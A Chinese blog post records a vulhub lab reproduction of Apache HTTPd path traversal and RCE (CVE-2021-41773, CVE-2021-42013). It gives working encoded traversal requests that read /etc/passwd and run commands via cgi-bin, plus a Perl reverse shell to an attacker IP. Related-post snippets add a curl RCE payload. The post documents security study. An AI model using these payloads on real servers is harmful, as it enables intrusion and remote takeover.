服务攻防演练

已于 2024-02-19 12:42:36 修改
阅读量136 收藏 1
点赞数
分类专栏: 学习历程 文章标签: 中间件 安全
于 2023-09-10 19:45:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_29948489/article/details/132794727
版权

中间件安全-环境准备

win11
ubuntu
vulhub

知识点

中间件-IIS-短文件&解析&蓝屏等

中间件-Nginx-文件解析&命令执行等

中间件-Apache-RCE&目录遍历&文件解析等

中间件-Tomcat-弱口令&文件上传&文件包含等

项目案例

IIS-短文件&解析&蓝屏等

已复现,不在写入

Nginx-文件解析&命令执行等
CVE-2021-42013 RCE

这是CVE-202141773的二版,在上次修复漏洞时,没有严格过滤,导致出现的二次CVE

启动服务,以前都操作过,不在细讲

在这里插入图片描述

win11访问

在这里插入图片描述

bp抓包,get发送payload,证明存在漏洞

GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

在这里插入图片描述

GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

在这里插入图片描述

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 

echo;id

在这里插入图片描述


POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 
echo;perl -e 'use Socket;$i="192.168.109.1";$p=5577;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'

在这里插入图片描述

在这里插入图片描述

CVE-2021-41773 RCE

启动

在这里插入图片描述

在这里插入图片描述

POST /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在这里插入图片描述

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

echo;id;

在这里插入图片描述

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

echo;perl -e 'use Socket;$i="192.168.109.1";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'

在这里插入图片描述

Apache HTTPd路径穿越及RCE
如果巅峰留不住,那就重走来时路
05-12 293
困难、痛苦、挫折总是接踵而至,这正是世间的常理。要是输了,就只能说明我不过是如此程度的男人。
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
weixin_47311099的博客
12-07 2528
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013) Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 这个漏洞可以影响Apache HTTP Server 2.4.49
Apache CVE-2021-41773 复现
白昼小丑的博客
10-10 2146
CVE-2021-41773 poc: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 但是近期国外的师傅研究出了直接RCE的方法,Payload如下: curl --data "A=|id>/tmp/x" 'URL/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv 如果想要进行RCE的话就要开启CGI。 ...
xctf web之 command_execution
L1ni01
08-06 275
打开题目 源代码也没东西 题目为 命令执行 并且题目提示没 waf 肯定就用到命令执行漏洞 先介绍一下 命令执行漏洞: 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 常见连接符 ;A;B 先执行A,再执行B & A&B 简单拼接,A B之间无制约关系 | A|B 显示B的执行结果 &&amp
Apache 2.4.49 路径穿越漏洞复现(CVE-2021-41773)
qq_51163834的博客
05-31 555
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。启动环境前要先到对应的目录。如本次对CVE-2021-41773漏洞进行复现,先到vulhub/httpd/CVE-2021-41773目录下启动环境。首次尝试要先安装docker、docker-compose、vulhub。Burpsuite中,获取passwd文件内容。反弹shell。Burpsuit下输出当前用户。
中间件,框架漏洞
hovcfuti的博客
07-28 196
爆出weblogic的WLS组件存在xmldecoder反序列化漏洞,直接post构造的xml数据包即可。文件夹解析:新建文件夹:aaa.asp,文件夹下的所有文件都会被当成asp去解析。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝。版本对路径规范化所做的更改中存在—个路径穿越漏洞,Weblogic IIOP协议反序列化(CVE-Weblogic T3协议反序列化(CVE-射到由类似别名的指令配置的目录之外的文件。Weblogic未授权访问-CVE-,则这可能允许远程代码执行。
中间件漏洞原理与复现大全【万字总结】
congsec的博客
08-18 3124
中间件是位于应用程序与操作系统之间的软件,它提供了不同组件之间的通信、数据管理、应用服务等功能。中间件漏洞是指在中间件的设计、实现或配置中存在的安全问题,这些问题可能让攻击者有机会突破安全防护,获取不当的权限,或者进行其他不安全操作。
网络安全攻防演练服务实施方案和实施计划
06-02
近年来,随着国家级/省级HW行动的开展并取得良好成效,各行各业都希望开展自己的攻防演练活动,完善自身的安全防护能力,践行“没有网络安全就没有国家安全”的号召。本文档提供了攻防演练实施方案和实施计划参考...
攻防演练方案相关的附件模板
07-02
在网络安全领域,攻防演练是一种重要的实践方法,用于检测、评估和提高组织的安全防护能力。以下是对"攻防演练方案相关的附件模板"的详细解读: 首先,攻防演练授权委托书是攻防演练活动的起点,它明确了演练的法律...
2023年攻防演练防守报告模板.docx
08-26
攻防演练防守报告】 一、事件概述 本次攻防演练中,我们遭遇了一次复杂的网络攻击,事件发生于2023年X月X日。攻击者首先通过精心设计的钓鱼邮件对内部员工进行钓鱼攻击,成功获取了办公终端的权限。攻击者在Y月Y...
《2024攻防演练必修高危漏洞集合》
06-19
### 2024攻防演练必修高危漏洞集合 #### 一、前言 随着信息技术的快速发展,网络安全已成为企业不可忽视的关键领域之一。近年来,攻防演练(HW)作为检验网络安全防护能力的重要手段,得到了广泛的应用和发展。在...
网络安全攻防演练防守方方案.docx
06-09
网络安全攻防演练是一种模拟实战环境下的安全测试活动,旨在评估并提升防守方的网络安全防护能力和应急响应机制。本文档详细阐述了防守方的方案,涵盖了从演练背景、组织分工到具体执行步骤等多个方面。 首先,攻防...
NSSCTF Round#4
qq_62046696的博客
08-18 438
上传后用phar伪协议读取,格式phar://文件上传的路径.phar.phar 自己设置的名称。感觉不太完整,也没反序列化,脑子里第一想的会不会是构建一个phar包,自动实现序列化这种。打开界面感觉这道题和上一个一样,有查询文件的功能,直接查询flag,签到提。步骤没错,可是缺乏考虑,wp中说,这里制造了一个文件夹迷宫,仅存在四层。搜一下有,2.4.49有目录遍及的漏洞,和以前做的一道题几乎一样。}这里冲突,应该会绕过wakeup,大于属性个数,以上都是自己的分析,看完wp。.
Apache CVE-2021-41773漏洞复现
3tefanie丶zhou的博客
10-11 3122
漏洞简介 Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服
CVE-2021-41773&&CVE-2021-42013复现
weixin_42345596的博客
10-09 5056
CVE-2021-41773 漏洞原理 Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响: 版本等于2.4.49 <Directory />Require all granted</Directory>(默认情况下是允许被访问的)。 攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在
CVE-2021-42013:Apache HTTP Server目录遍历漏洞
weixin_47179815的博客
07-13 3040
该漏洞是由于在Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。Apache HTTP Server 2.4.50 Apache HTTP Server 2.4.49查询地址:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202
【极兔快递Java社招】一面复盘|数据库+线程池+AQS+中间件面面俱到
HELLO_E_SIR的博客
05-14 1579
这场极兔的一面整体覆盖广度很大,从数据库事务、索引、锁机制到线程池、AQS 乃至分库分表、中间件都有所涉及,虽然没有特别刁钻的场景题,但对基础知识的掌握要求较高,细节问得也不少。由于准备时间比较紧,项目没有讲出亮点是个遗憾,建议未来面试时,项目部分尽量结合「问题-方案-收益」的结构来展开,更容易吸引面试官深入追问。📣如果你也在准备 Java 后端社招,可以留言交流,我会持续整理类似的高频面试题+项目思路拆解,祝大家都能稳稳上岸 💪!
最新版Chrome浏览器调用ActiveX控件技术——alWebPlugin中间件V2.0.42版发布
最新发布
allWeblugin中间件推广和宣传
05-21 405
alWebPlugin中间件V2.0.42版发布
mysql数据库-中间件MyCat
2501_91384465的博客
05-17 417
语句优化、代码优化,数据库的处理本身优化也是非常重要的。协议与大多数主流数据库服务器通信,其核心功能是分表分库,即将一个大表水平分割为。时如果有分布式事务,得先看是否得保证事务得强一致性,否则请慎重使用。官方网站 http://www.mycat.org.cn/协议的服务器,前端用户可以把它看作是一个数据库代理(类似于。操作,要确保表的关联字段具有相同的数据分布,否则请慎重使用。是一个开源的分布式数据库系统,是一个实现了。客户端工具和命令行访问,而其后端可以用。服务器通信,也可以用。
奇安信红蓝紫攻防演练手册2020
从文件的标签“攻防演练”来看,这份手册是专注于网络安全攻防演练的实用指南,旨在帮助网络安全团队提高实战能力。 最后,从压缩包子文件的文件名称列表中的“奇安信”来看,这可能是手册的提供者或者手册中涉及的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值